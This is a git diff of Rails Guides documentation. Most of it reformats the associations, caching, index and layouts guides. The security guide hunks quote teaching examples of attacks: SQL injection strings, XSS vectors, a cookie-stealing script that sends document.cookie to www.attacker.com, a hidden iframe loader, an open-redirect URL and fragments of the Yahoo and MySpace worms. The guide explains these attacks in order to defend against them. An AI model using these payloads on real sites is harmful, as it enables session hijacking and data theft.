* +:validate+ -h6. :as +h6. +:as+ -Setting the +:as+ option indicates that this is a polymorphic association, as discussed <a href="#polymorphic-associations">earlier in this guide</a>. +Setting the +:as+ option indicates that this is a polymorphic association, as discussed <a href="#polymorphicassociations">earlier in this guide</a>. -h6. :autosave +h6. +:autosave+ If you set the +:autosave+ option to +true+, Rails will save any loaded members and destroy members that are marked for destruction whenever you save the parent object. -h6. :class_name +h6. +:class_name+ If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if a customer has many orders, but the actual name of the model containing orders is +Transaction+, you'd set things up this way: @@ -1175,7 +1174,7 @@ class Customer < ActiveRecord::Base end </ruby> -h6. :conditions +h6. +:conditions+ The +:conditions+ option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL +WHERE+ clause). @@ -1197,27 +1196,27 @@ end If you use a hash-style +:conditions+ option, then record creation via this association will be automatically scoped using the hash. In this case, using +@customer.confirmed_orders.create+ or +@customer.confirmed_orders.build+ will create orders where the confirmed column has the value +true+. -h6. :counter_sql +h6. +:counter_sql+ Normally Rails automatically generates the proper SQL to count the association members. With the +:counter_sql+ option, you can specify a complete SQL statement to count them yourself. NOTE: If you specify +:finder_sql+ but not +:counter_sql+, then the counter SQL will be generated by substituting +SELECT COUNT(*) FROM+ for the +SELECT ... FROM+ clause of your +:finder_sql+ statement. -h6. :dependent +h6. +:dependent+ -If you set the +:dependent+ option to +:destroy+, then deleting this object will call the destroy method on the associated objects to delete those objects. If you set the +:dependent+ option to +:delete_all+, then deleting this object will delete the associated objects _without_ calling their +destroy+ method. If you set the +:dependent+ option to +:nullify+, then deleting this object will set the foreign key in the associated objects to +NULL+. +If you set the +:dependent+ option to +:destroy+, then deleting this object will call the +destroy+ method on the associated objects to delete those objects. If you set the +:dependent+ option to +:delete_all+, then deleting this object will delete the associated objects _without_ calling their +destroy+ method. If you set the +:dependent+ option to +:nullify+, then deleting this object will set the foreign key in the associated objects to +NULL+. NOTE: This option is ignored when you use the +:through+ option on the association. -h6. :extend +h6. +:extend+ -The +:extend+ option specifies a named module to extend the association proxy. Association extensions are discussed in detail <a href="#association-extensions">later in this guide</a>. +The +:extend+ option specifies a named module to extend the association proxy. Association extensions are discussed in detail <a href="#associationextensions">later in this guide</a>. -h6. :finder_sql +h6. +:finder_sql+ Normally Rails automatically generates the proper SQL to fetch the association members. With the +:finder_sql+ option, you can specify a complete SQL statement to fetch them yourself. If fetching objects requires complex multi-table SQL, this may be necessary. -h6. :foreign_key +h6. +:foreign_key+ By convention, Rails guesses that the column used to hold the foreign key on the other model is the name of this model with the suffix +_id+ added. The +:foreign_key+ option lets you set the name of the foreign key directly: @@ -1229,7 +1228,7 @@ end TIP: In any case, Rails will not create foreign key columns for you. You need to explicitly define them as part of your migrations. -h6. :group +h6. +:group+ The +:group+ option supplies an attribute name to group the result set by, using a +GROUP BY+ clause in the finder SQL. @@ -1239,7 +1238,7 @@ class Customer < ActiveRecord::Base end </ruby> -h6. :include +h6. +:include+ You can use the +:include+ option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models: @@ -1275,7 +1274,7 @@ class LineItem < ActiveRecord::Base end </ruby> -h6. :limit +h6. +:limit+ The +:limit+ option lets you restrict the total number of objects that will be fetched through an association. @@ -1286,11 +1285,11 @@ class Customer < ActiveRecord::Base end </ruby> -h6. :offset +h6. +:offset+ The +:offset+ option lets you specify the starting offset for fetching objects via an association. For example, if you set +:offset => 11+, it will skip the first 11 records. -h6. :order +h6. +:order+ The +:order+ option dictates the order in which associated objects will be received (in the syntax used by a SQL +ORDER BY+ clause). @@ -1300,41 +1299,41 @@ class Customer < ActiveRecord::Base end </ruby> -h6. :primary_key +h6. +:primary_key+ -By convention, Rails guesses that the column used to hold the primary key of this model is +id+. You can override this and explicitly specify the primary key with the +:primary_key+ option. +By convention, Rails guesses that the column used to hold the primary key of the association is +id+. You can override this and explicitly specify the primary key with the +:primary_key+ option. -h6. :readonly +h6. +:readonly+ If you set the +:readonly+ option to +true+, then the associated objects will be read-only when retrieved via the association. -h6. :select +h6. +:select+ The +:select+ option lets you override the SQL +SELECT+ clause that is used to retrieve data about the associated objects. By default, Rails retrieves all columns. WARNING: If you specify your own +:select+, be sure to include the primary key and foreign key columns of the associated model. If you do not, Rails will throw an error. -h6. :source +h6. +:source+ The +:source+ option specifies the source association name for a +has_many :through+ association. You only need to use this option if the name of the source association cannot be automatically inferred from the association name. -h6. :source_type +h6. +:source_type+ The +:source_type+ option specifies the source association type for a +has_many :through+ association that proceeds through a polymorphic association. -h6. :through +h6. +:through+ -The +:through+ option specifies a join model through which to perform the query. +has_many :through+ associations provide a way to implement many-to-many relationships, as discussed <a href="#thehas-manythrough-association">earlier in this guide</a>. +The +:through+ option specifies a join model through which to perform the query. +has_many :through+ associations provide a way to implement many-to-many relationships, as discussed <a href="#thehas-manythroughassociation">earlier in this guide</a>. -h6. :uniq +h6. +:uniq+ Specify the +:uniq => true+ option to remove duplicates from the collection. This is most useful in conjunction with the +:through+ option. -h6. :validate +h6. +:validate+ If you set the +:validate+ option to +false+, then associated objects will not be validated whenever you save this object. By default, this is +true+: associated objects will be validated when this object is saved. -h5. When are Objects Saved? +h5. When are objects saved? When you assign an object to a +has_many+ association, that object is automatically saved (in order to update its foreign key). If you assign multiple objects in one statement, then they are all saved. @@ -1344,11 +1343,11 @@ If the parent object (the one declaring the +has_many+ association) is unsaved ( If you want to assign an object to a +has_many+ association without saving the object, use the <tt><em>collection</em>.build</tt> method. -h4. has_and_belongs_to_many Association Reference +h4. +has_and_belongs_to_many+ association reference The +has_and_belongs_to_many+ association creates a many-to-many relationship with another model. In database terms, this associates two classes via an intermediate join table that includes foreign keys referring to each of the classes. -h5. Methods Added +h5. Methods added When you declare a +has_and_belongs_to_many+ association, the declaring class automatically gains 13 methods related to the association: @@ -1392,14 +1391,14 @@ assemblies.build(attributes = {}, ...) assemblies.create(attributes = {}) </ruby> -h6. Additional Column Methods +h6. Additional column methods If the join table for a +has_and_belongs_to_many+ association has additional columns beyond the two foreign keys, these columns will be added as attributes to records retrieved via that association. Records returned with additional attributes will always be read-only, because Rails cannot save changes to those attributes. WARNING: The use of extra attributes on the join table in a +has_and_belongs_to_many+ association is deprecated. If you require this sort of complex behavior on the table that joins two models in a many-to-many relationship, you should use a +has_many :through+ association instead of +has_and_belongs_to_many+. -h6. <em>collection</em>(force_reload = false) +h6. <tt><em>collection</em>(force_reload = false)</tt> The <tt><em>collection</em></tt> method returns an array of all of the associated objects. If there are no associated objects, it returns an empty array. @@ -1407,7 +1406,7 @@ The <tt><em>collection</em></tt> method returns an array of all of the associate @assemblies = @part.assemblies </ruby> -h6. <em>collection</em><<(object, ...) +h6. <tt><em>collection</em><<(object, ...)</tt> The <tt><em>collection</em><<</tt> method adds one or more objects to the collection by creating records in the join table. @@ -1417,7 +1416,7 @@ The <tt><em>collection</em><<</tt> method adds one or more objects to the collec NOTE: This method is aliased as <tt><em>collection</em>.concat</tt> and <tt><em>collection</em>.push</tt>. -h6. <em>collection</em>.delete(object, ...) +h6. <tt><em>collection</em>.delete(object, ...)</tt> The <tt><em>collection</em>.delete</tt> method removes one or more objects from the collection by deleting records in the join table. This does not destroy the objects. @@ -1425,11 +1424,11 @@ The <tt><em>collection</em>.delete</tt> method removes one or more objects from @part.assemblies.delete(@assembly1) </ruby> -h6. <em>collection</em>=objects +h6. <tt><em>collection</em>=objects</tt> The <tt><em>collection</em>=</tt> method makes the collection contain only the supplied objects, by adding and deleting as appropriate. -h6. <em>collection_singular</em>_ids +h6. <tt><em>collection_singular</em>_ids</tt> The <tt><em>collection_singular</em>_ids</tt> method returns an array of the ids of the objects in the collection. @@ -1437,15 +1436,15 @@ The <tt><em>collection_singular</em>_ids</tt> method returns an array of the ids @assembly_ids = @part.assembly_ids </ruby> -h6. <em>collection_singular</em>_ids=ids +h6. <tt><em>collection_singular</em>_ids=ids</tt> The <tt><em>collection_singular</em>_ids=</tt> method makes the collection contain only the objects identified by the supplied primary key values, by adding and deleting as appropriate. -h6. <em>collection</em>.clear +h6. <tt><em>collection</em>.clear</tt> The <tt><em>collection</em>.clear</tt> method removes every object from the collection by deleting the rows from the joining table. This does not destroy the associated objects. -h6. <em>collection</em>.empty? +h6. <tt><em>collection</em>.empty?</tt> The <tt><em>collection</em>.empty?</tt> method returns +true+ if the collection does not contain any associated objects. @@ -1455,7 +1454,7 @@ The <tt><em>collection</em>.empty?</tt> method returns +true+ if the collection <% end %> </ruby> -h6. <em>collection</em>.size +h6. <tt><em>collection</em>.size</tt> The <tt><em>collection</em>.size</tt> method returns the number of objects in the collection. @@ -1463,7 +1462,7 @@ The <tt><em>collection</em>.size</tt> method returns the number of objects in th @assembly_count = @part.assemblies.size </ruby> -h6. <em>collection</em>.find(...) +h6. <tt><em>collection</em>.find(...)</tt> The <tt><em>collection</em>.find</tt> method finds objects within the collection. It uses the same syntax and options as +ActiveRecord::Base.find+. It also adds the additional condition that the object must be in the collection. @@ -1472,11 +1471,11 @@ The <tt><em>collection</em>.find</tt> method finds objects within the collection :conditions => ["created_at > ?", 2.days.ago]) </ruby> -h6. <em>collection</em>.exist?(...) +h6. <tt><em>collection</em>.exist?(...)</tt> The <tt><em>collection</em>.exist?</tt> method checks whether an object meeting the supplied conditions exists in the collection. It uses the same syntax and options as +ActiveRecord::Base.exists?+. -h6. <em>collection</em>.build(attributes = {}) +h6. <tt><em>collection</em>.build(attributes = {})</tt> The <tt><em>collection</em>.build</tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through the join table will be created, but the associated object will _not_ yet be saved. @@ -1485,7 +1484,7 @@ The <tt><em>collection</em>.build</tt> method returns a new object of the associ {:assembly_name => "Transmission housing"}) </ruby> -h6. <em>collection</em>.create(attributes = {}) +h6. <tt><em>collection</em>.create(attributes = {})</tt> The <tt><em>collection</em>.create</tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, the link through the join table will be created, and the associated object _will_ be saved (assuming that it passes any validations). @@ -1494,7 +1493,7 @@ The <tt><em>collection</em>.create</tt> method returns a new object of the assoc {:assembly_name => "Transmission housing"}) </ruby> -h5. Options for has_and_belongs_to_many +h5. Options for +has_and_belongs_to_many+ In many situations, you can use the default behavior for +has_and_belongs_to_many+ without any customization. But you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a +has_and_belongs_to_many+ association. For example, an association with several options might look like this: @@ -1528,7 +1527,7 @@ The +has_and_belongs_to_many+ association supports these options: * +:uniq+ * +:validate+ -h6. :association_foreign_key +h6. +:association_foreign_key+ By convention, Rails guesses that the column in the join table used to hold the foreign key pointing to the other model is the name of that model with the suffix +_id+ added. The +:association_foreign_key+ option lets you set the name of the foreign key directly: @@ -1542,11 +1541,11 @@ class User < ActiveRecord::Base end </ruby> -h6. :autosave +h6. +:autosave+ If you set the +:autosave+ option to +true+, Rails will save any loaded members and destroy members that are marked for destruction whenever you save the parent object. -h6. :class_name +h6. +:class_name+ If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if a part has many assemblies, but the actual name of the model containing assemblies is +Gadget+, you'd set things up this way: @@ -1556,7 +1555,7 @@ class Parts < ActiveRecord::Base end </ruby> -h6. :conditions +h6. +:conditions+ The +:conditions+ option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL +WHERE+ clause). @@ -1576,27 +1575,27 @@ class Parts < ActiveRecord::Base end </ruby> -If you use a hash-style +:conditions+ option, then record creation via this association will be automatically scoped using the hash. In this case, using +@parts.assemblies.create+ or +@parts.assemblies.build+ will create orders where the factory column has the value "Seattle". +If you use a hash-style +:conditions+ option, then record creation via this association will be automatically scoped using the hash. In this case, using +@parts.assemblies.create+ or +@parts.assemblies.build+ will create orders where the +factory+ column has the value "Seattle". -h6. :counter_sql +h6. +:counter_sql+ Normally Rails automatically generates the proper SQL to count the association members. With the +:counter_sql+ option, you can specify a complete SQL statement to count them yourself. NOTE: If you specify +:finder_sql+ but not +:counter_sql+, then the counter SQL will be generated by substituting +SELECT COUNT(*) FROM+ for the +SELECT ... FROM+ clause of your +:finder_sql+ statement. -h6. :delete_sql +h6. +:delete_sql+ Normally Rails automatically generates the proper SQL to remove links between the associated classes. With the +:delete_sql+ option, you can specify a complete SQL statement to delete them yourself. -h6. :extend +h6. +:extend+ -The +:extend+ option specifies a named module to extend the association proxy. Association extensions are discussed in detail <a href="#association-extensions">later in this guide</a>. +The +:extend+ option specifies a named module to extend the association proxy. Association extensions are discussed in detail <a href="#associationextensions">later in this guide</a>. -h6. :finder_sql +h6. +:finder_sql+ Normally Rails automatically generates the proper SQL to fetch the association members. With the +:finder_sql+ option, you can specify a complete SQL statement to fetch them yourself. If fetching objects requires complex multi-table SQL, this may be necessary. -h6. :foreign_key +h6. +:foreign_key+ By convention, Rails guesses that the column in the join table used to hold the foreign key pointing to this model is the name of this model with the suffix +_id+ added. The +:foreign_key+ option lets you set the name of the foreign key directly: @@ -1608,7 +1607,7 @@ class User < ActiveRecord::Base end </ruby> -h6. :group +h6. +:group+ The +:group+ option supplies an attribute name to group the result set by, using a +GROUP BY+ clause in the finder SQL. @@ -1618,19 +1617,19 @@ class Parts < ActiveRecord::Base end </ruby> -h6. :include +h6. +:include+ You can use the +:include+ option to specify second-order associations that should be eager-loaded when this association is used. -h6. :insert_sql +h6. +:insert_sql+ Normally Rails automatically generates the proper SQL to create links between the associated classes. With the +:insert_sql+ option, you can specify a complete SQL statement to insert them yourself. -h6. :join_table +h6. +:join_table+ If the default name of the join table, based on lexical ordering, is not what you want, you can use the +:join_table+ option to override the default. -h6. :limit +h6. +:limit+ The +:limit+ option lets you restrict the total number of objects that will be fetched through an association. @@ -1641,11 +1640,11 @@ class Parts < ActiveRecord::Base end </ruby> -h6. :offset +h6. +:offset+ The +:offset+ option lets you specify the starting offset for fetching objects via an association. For example, if you set +:offset => 11+, it will skip the first 11 records. -h6. :order +h6. +:order+ The +:order+ option dictates the order in which associated objects will be received (in the syntax used by a SQL +ORDER BY+ clause). @@ -1655,23 +1654,23 @@ class Parts < ActiveRecord::Base end </ruby> -h6. :readonly +h6. +:readonly+ If you set the +:readonly+ option to +true+, then the associated objects will be read-only when retrieved via the association. -h6. :select +h6. +:select+ The +:select+ option lets you override the SQL +SELECT+ clause that is used to retrieve data about the associated objects. By default, Rails retrieves all columns. -h6. :uniq +h6. +:uniq+ Specify the +:uniq => true+ option to remove duplicates from the collection. -h6. :validate +h6. +:validate+ If you set the +:validate+ option to +false+, then associated objects will not be validated whenever you save this object. By default, this is +true+: associated objects will be validated when this object is saved. -h5. When are Objects Saved? +h5. When are objects saved? When you assign an object to a +has_and_belongs_to_many+ association, that object is automatically saved (in order to update the join table). If you assign multiple objects in one statement, then they are all saved. @@ -1681,7 +1680,7 @@ If the parent object (the one declaring the +has_and_belongs_to_many+ associatio If you want to assign an object to a +has_and_belongs_to_many+ association without saving the object, use the <tt><em>collection</em>.build</tt> method. -h4. Association Callbacks +h4. Association callbacks Normal callbacks hook into the lifecycle of Active Record objects, allowing you to work with those objects at various points. For example, you can use a +:before_save+ callback to cause something to happen just before an object is saved. @@ -1725,7 +1724,7 @@ end If a +before_add+ callback throws an exception, the object does not get added to the collection. Similarly, if a +before_remove+ callback throws an exception, the object does not get removed from the collection. -h4. Association Extensions +h4. Association extensions You're not limited to the functionality that Rails automatically builds into association proxy objects. You can also extend these objects through anonymous modules, adding new finders, creators, or other methods. For example: @@ -1757,7 +1756,7 @@ class Supplier < ActiveRecord::Base end </ruby> -To include more than one extension module in a single association, specify an array of names: +To include more than one extension module in a single association, specify an array of modules: <ruby> class Customer < ActiveRecord::Base diff --git a/railties/guides/source/caching_with_rails.textile b/railties/guides/source/caching_with_rails.textile index 9736be8443..b1c1af8be4 100644 --- a/railties/guides/source/caching_with_rails.textile +++ b/railties/guides/source/caching_with_rails.textile @@ -500,16 +500,17 @@ seriously considering optimizing their caching needs. Also the new "Cache money":http://github.com/nkallen/cache-money/tree/master plugin is supposed to be mad cool. h3. References - * "RailsEnvy, Rails Caching Tutorial, Part 1":http://www.railsenvy.com/2007/2/28/rails-caching-tutorial - * "RailsEnvy, Rails Caching Tutorial, Part 1":http://www.railsenvy.com/2007/3/20/ruby-on-rails-caching-tutorial-part-2 - * "ActiveSupport::Cache documentation":http://api.rubyonrails.org/classes/ActiveSupport/Cache.html - * "Rails 2.1 integrated caching tutorial":http://thewebfellas.com/blog/2008/6/9/rails-2-1-now-with-better-integrated-caching +* "RailsEnvy, Rails Caching Tutorial, Part 1":http://www.railsenvy.com/2007/2/28/rails-caching-tutorial +* "RailsEnvy, Rails Caching Tutorial, Part 1":http://www.railsenvy.com/2007/3/20/ruby-on-rails-caching-tutorial-part-2 +* "ActiveSupport::Cache documentation":http://api.rubyonrails.org/classes/ActiveSupport/Cache.html +* "Rails 2.1 integrated caching tutorial":http://thewebfellas.com/blog/2008/6/9/rails-2-1-now-with-better-integrated-caching h3. Changelog + "Lighthouse ticket":http://rails.lighthouseapp.com/projects/16213-rails-guides/tickets/10-guide-to-caching -February 22, 2009: Beefed up the section on cache_stores -December 27, 2008: Typo fixes -November 23, 2008: Incremental updates with various suggested changes and formatting cleanup -September 15, 2008: Initial version by Aditya Chadha +* February 22, 2009: Beefed up the section on cache_stores +* December 27, 2008: Typo fixes +* November 23, 2008: Incremental updates with various suggested changes and formatting cleanup +* September 15, 2008: Initial version by Aditya Chadha diff --git a/railties/guides/source/index.erb.textile b/railties/guides/source/index.erb.textile index 4751c3a1f5..49d8cad404 100644 --- a/railties/guides/source/index.erb.textile +++ b/railties/guides/source/index.erb.textile @@ -73,6 +73,10 @@ h3. Digging Deeper <dl> +<% guide("Rails on Rack", 'rails_on_rack.html') do %> + This guide covers Rails integration with Rack and interfacing with other Rack components. +<% end %> + <% guide("Rails Internationalization API", 'i18n.html', :ticket => 23) do %> This guide covers how to add internationalization to your applications. Your application will be able to translate content to different languages, change pluralization rules, use correct date formats for each country and so on. <% end %> @@ -109,8 +113,8 @@ h3. Digging Deeper This guide covers the command line tools and rake tasks provided by Rails. <% end %> -<% guide("Rails on Rack", 'rails_on_rack.html', :ticket => 58) do %> - This guide covers Rails integration with Rack and interfacing with other Rack components. +<% guide("Caching with Rails", 'caching_with_rails.html', :ticket => 10) do %> + Various caching techniques provided by Rails. <% end %> </dl> diff --git a/railties/guides/source/layouts_and_rendering.textile b/railties/guides/source/layouts_and_rendering.textile index d9bc605b84..5e2cedcf0c 100644 --- a/railties/guides/source/layouts_and_rendering.textile +++ b/railties/guides/source/layouts_and_rendering.textile @@ -683,7 +683,7 @@ Within the context of a layout, +yield+ identifies a section where content from </head> <body> <%= yield %> - <hbody> + </body> </html> </erb> @@ -696,7 +696,7 @@ You can also create a layout with multiple yielding regions: </head> <body> <%= yield %> - <hbody> + </body> </html> </erb> @@ -723,7 +723,7 @@ The result of rendering this page into the supplied layout would be this HTML: </head> <body> <p>Hello, Rails!</p> - <hbody> + </body> </html> </erb> @@ -822,7 +822,7 @@ Every partial also has a local variable with the same name as the partial (minus <%= render :partial => "customer", :object => @new_customer %> </erb> -Within the +customer+ partial, the +@customer+ variable will refer to +@new_customer+ from the parent view. +Within the +customer+ partial, the +customer+ variable will refer to +@new_customer+ from the parent view. WARNING: In previous versions of Rails, the default local variable would look for an instance variable with the same name as the partial in the parent. This behavior is deprecated in Rails 2.2 and will be removed in a future version. diff --git a/railties/guides/source/security.textile b/railties/guides/source/security.textile index 6b84ca1965..5797eb888b 100644 --- a/railties/guides/source/security.textile +++ b/railties/guides/source/security.textile @@ -91,12 +91,12 @@ Rails 2 introduced a new default session storage, CookieStore. CookieStore saves That means the security of this storage depends on this secret (and on the digest algorithm, which defaults to SHA512, which has not been compromised, yet). So _(highlight)don't use a trivial secret, i.e. a word from a dictionary, or one which is shorter than 30 characters_. Put the secret in your environment.rb: -<pre> +<ruby> config.action_controller.session = { :key => '_app_session', :secret => '0x0dkfj3927dkc7djdh36rkckdfzsg...' } -</pre> +</ruby> There are, however, derivatives of CookieStore which encrypt the session hash, so the client cannot see it. @@ -211,9 +211,9 @@ If your web application is RESTful, you might be used to additional HTTP verbs, _(highlight)The verify method in a controller can make sure that specific actions may not be used over GET_. Here is an example to verify the use of the transfer action over POST. If the action comes in using any other verb, it redirects to the list action. -<pre> +<ruby> verify :method => :post, :only => [:transfer], :redirect_to => {:action => :list} -</pre> +</ruby> With this precaution, the attack from above will not work, because the browser sends a GET request for images, which will not be accepted by the web application. @@ -264,9 +264,9 @@ end This will redirect the user to the main action if he tried to access a legacy action. The intention was to preserve the URL parameters to the legacy action and pass them to the main action. However, it can exploited by an attacker if he includes a host key in the URL: -<pre> +<plain> http://www.example.com/site/legacy?param1=xy¶m2=23&host=www.attacker.com -</pre> +</plain> If it is at the end of the URL it will hardly be noticed and redirects the user to the attacker.com host. A simple countermeasure would be to _(highlight)include only the expected parameters in a legacy action_ (again a whitelist approach, as opposed to removing unexpected parameters). _(highlight)And if you redirect to an URL, check it with a whitelist or a regular expression_. @@ -424,10 +424,10 @@ There are some authorization and authentication plug-ins for Rails available. A Every new user gets an activation code to activate his account when he gets an e-mail with a link in it. After activating the account, the activation_code columns will be set to NULL in the database. If someone requested an URL like these, he would be logged in as the first activated user found in the database (and chances are that this is the administrator): -<pre> +<plain> http://localhost:3006/user/activate http://localhost:3006/user/activate?id= -</pre> +</plain> This is possible because on some servers, this way the parameter id, as in params[:id], would be nil. However, here is the finder from the activation action: @@ -437,9 +437,9 @@ User.find_by_activation_code(params[:id]) If the parameter was nil, the resulting SQL query will be -<pre> +<sql> SELECT * FROM users WHERE (users.activation_code IS NULL) LIMIT 1 -</pre> +</sql> And thus it found the first user in the database, returned it and logged him in. You can find out more about it in "my blog post":http://www.rorsecurity.info/2007/10/28/restful_authentication-login-security/. _(highlight)It is advisable to update your plug-ins from time to time_. Moreover, you can review your application to find more flaws like this. @@ -534,9 +534,9 @@ end This means, upon saving, the model will validate the file name to consist only of alphanumeric characters, dots, + and -. And the programmer added \^ and $ so that file name will contain these characters from the beginning to the end of the string. However, _(highlight)in Ruby ^ and $ matches the *line* beginning and line end_. And thus a file name like this passes the filter without problems: -<pre> +<plain> file.txt%0A<script>alert('hello')</script> -</pre> +</plain> Whereas %0A is a line feed in URL encoding, so Rails automatically converts it to "file.txt\n<script>alert('hello')</script>". This file name passes the filter because the regular expression matches – up to the line end, the rest does not matter. The correct expression should read: @@ -599,9 +599,9 @@ Project.find(:all, :conditions => "name = '#{params[:name]}'") This could be in a search action and the user may enter a project's name that he wants to find. If a malicious user enters ' OR 1=1', the resulting SQL query will be: -<pre> +<sql> SELECT * FROM projects WHERE name = '' OR 1 --' -</pre> +</sql> The two dashes start a comment ignoring everything after it. So the query returns all records from the projects table including those blind to the user. This is because the condition is true for all records. @@ -615,9 +615,9 @@ User.find(:first, "login = '#{params[:name]}' AND password = '#{params[:password If an attacker enters ' OR '1'='1 as the name, and ' OR '2'>'1 as the password, the resulting SQL query will be: -<pre> +<sql> SELECT * FROM users WHERE login = '' OR '1'='1' AND password = '' OR '2'>'1' LIMIT 1 -</pre> +</sql> This will simply find the first record in the database, and grants access to this user. @@ -631,16 +631,16 @@ Project.find(:all, :conditions => "name = '#{params[:name]}'") And now let's inject another query using the UNION statement: -<pre> +<plain> ') UNION SELECT id,login AS name,password AS description,1,1,1 FROM users -- -</pre> +</plain> This will result in the following SQL query: -<pre> +<sql> SELECT * FROM projects WHERE (name = '') UNION SELECT id,login AS name,password AS description,1,1,1 FROM users --') -</pre> +</sql> The result won't be a list of projects (because there is no project with an empty name), but a list of user names and their password. So hopefully you encrypted the passwords in the database! The only problem for the attacker is, that the number of columns has to be the same in both queries. That's why the second query includes a list of ones (1), which will be always the value 1, in order to match the number of columns in the first query. @@ -686,36 +686,36 @@ The most common XSS language is of course the most popular client-side scripting Here is the most straightforward test to check for XSS: -<pre> +<html> <script>alert('Hello');</script> -</pre> +</html> This JavaScript code will simply display an alert box. The next examples do exactly the same, only in very uncommon places: -<pre> +<html> <img src=javascript:alert('Hello')> <table background="javascript:alert('Hello')"> -</pre> +</html> h6. Cookie theft These examples don't do any harm so far, so let's see how an attacker can steal the user's cookie (and thus hijack the user's session). In JavaScript you can use the document.cookie property to read and write the document's cookie. JavaScript enforces the same origin policy, that means a script from one domain cannot access cookies of another domain. The document.cookie property holds the cookie of the originating web server. However, you can read and write this property, if you embed the code directly in the HTML document (as it happens with XSS). Inject this anywhere in your web application to see your own cookie on the result page: -<pre> +<plain> <script>document.write(document.cookie);</script> -</pre> +</plain> For an attacker, of course, this is not useful, as the victim will see his own cookie. The next example will try to load an image from the URL http://www.attacker.com/ plus the cookie. Of course this URL does not exist, so the browser displays nothing. But the attacker can review his web server's access log files to see the victims cookie. -<pre> +<html> <script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script> -</pre> +</html> The log files on www.attacker.com will read like this: -<pre> +<plain> GET http://www.attacker.com/_app_session=836c1c25278e5b321d6bea4f19cb57e2 -</pre> +</plain> You can mitigate these attacks (in the obvious way) by adding the "httpOnly":http://dev.rubyonrails.org/ticket/8895 flag to cookies, so that document.cookie may not be read by JavaScript. Http only cookies can be used from IE v6.SP1, Firefox v2.0.0.5 and Opera 9.5. Safari is still considering, it ignores the option. But other, older browsers (such as WebTV and IE 5.5 on Mac) can actually cause the page to fail to load. Be warned that cookies "will still be visible using Ajax":http://ha.ckers.org/blog/20070719/firefox-implements-httponly-and-is-vulnerable-to-xmlhttprequest/, though. @@ -723,9 +723,9 @@ h6. Defacement With web page defacement an attacker can do a lot of things, for example, present false information or lure the victim on the attackers web site to steal the cookie, login credentials or other sensitive data. The most popular way is to include code from external sources by iframes: -<pre> +<html> <iframe name=”StatPage” src="http://58.xx.xxx.xxx" width=5 height=5 style=”display:none”></iframe> -</pre> +</html> This loads arbitrary HTML and/or JavaScript from an external source and embeds it as part of the site. This iFrame is taken from an "actual attack":http://www.symantec.com/enterprise/security_response/weblog/2007/06/italy_under_attack_mpack_gang.html on legitimate Italian sites using the "Mpack attack framework":http://isc.sans.org/diary.html?storyid=3015. Mpack tries to install malicious software through security holes in the web browser – very successfully, 50% of the attacks succeed. @@ -733,10 +733,10 @@ A more specialized attack could overlap the entire web site or display a login f Reflected injection attacks are those where the payload is not stored to present it to the victim later on, but included in the URL. Especially search forms fail to escape the search string. The following link presented a page which stated that "George Bush appointed a 9 year old boy to be the chairperson...": -<pre> +<plain> http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--> <script src=http://www.securitylab.ru/test/sc.js></script><!-- -</pre> +</plain> h6. Countermeasures @@ -746,16 +746,16 @@ Especially for XSS, it is important to do _(highlight)whitelist input filtering Imagine a blacklist deletes “script” from the user input. Now the attacker injects “<scrscriptipt>”, and after the filter, “<script>” remains. Earlier versions of Rails used a blacklist approach for the strip_tags(), strip_links() and sanitize() method. So this kind of injection was possible: -<pre> +<ruby> strip_tags("some<<b>script>alert('hello')<</b>/script>") -</pre> +</ruby> This returned "some<script>alert('hello')</script>", which makes an attack work. That's why I vote for a whitelist approach, using the updated Rails 2 method sanitize(): -<pre> +<ruby> tags = %w(a acronym b strong i em li ul ol h1 h2 h3 h4 h5 h6 blockquote br cite sub sup ins p) s = sanitize(user_input, :tags => tags, :attributes => %w(href title)) -</pre> +</ruby> This allows only the given tags and does a good job, even against all kinds of tricks and malformed tags. @@ -765,24 +765,24 @@ h6. Obfuscation and Encoding Injection Network traffic is mostly based on the limited Western alphabet, so new character encodings, such as Unicode, emerged, to transmit characters in other languages. But, this is also a threat to web applications, as malicious code can be hidden in different encodings that the web browser might be able to process, but the web application might not. Here is an attack vector in UTF-8 encoding: -<pre> +<html> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97; &#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> -</pre> +</html> This example pops up a message box. It will be recognized by the above sanitize() filter, though. A great tool to obfuscate and encode strings, and thus “get to know your enemy”, is the "Hackvertor":http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php. Rails‘ sanitize() method does a good job to fend off encoding attacks. h5. Examples from the underground -</pre> _In order to understand today's attacks on web applications, it's best to take a look at some real-world attack vectors._ +_In order to understand today's attacks on web applications, it's best to take a look at some real-world attack vectors._ The following is an excerpt from the "Js.Yamanner@m":http://www.symantec.com/security_response/writeup.jsp?docid=2006-061211-4111-99&tabid=1 Yahoo! Mail "worm":http://groovin.net/stuff/yammer.txt. It appeared on June 11, 2006 and was the first webmail interface worm: -<pre> +<html> <img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' target=""onload="var http_request = false; var Email = ''; var IDList = ''; var CRumb = ''; function makeRequest(url, Func, Method,Param) { ... -</pre> +</html> The worms exploits a hole in Yahoo's HTML/JavaScript filter, which usually filters all target and onload attributes from tags (because there can be JavaScript). The filter is applied only once, however, so the onload attribute with the worm code stays in place. This is a good example why blacklist filters are never complete and why it is hard to allow HTML/JavaScript in a web application. @@ -800,27 +800,27 @@ CSS Injection is explained best by a well-known worm, the "MySpace Samy worm":ht MySpace blocks many tags, however it allows CSS. So the worm's author put JavaScript into CSS like this: -<pre> +<html> <div style="background:url('javascript:alert(1)')"> -</pre> +</html> So the payload is in the style attribute. But there are no quotes allowed in the payload, because single and double quotes have already been used. But JavaScript allows has a handy eval() function which executes any string as code. -<pre> +<html> <div id="mycode" expr="alert('hah!')" style="background:url('javascript:eval(document.all.mycode.expr)')"> -</pre> +</html> The eval() function is a nightmare for blacklist input filters, as it allows the style attribute to hide the word “innerHTML”: -<pre> +<plain> alert(eval('document.body.inne' + 'rHTML')); -</pre> 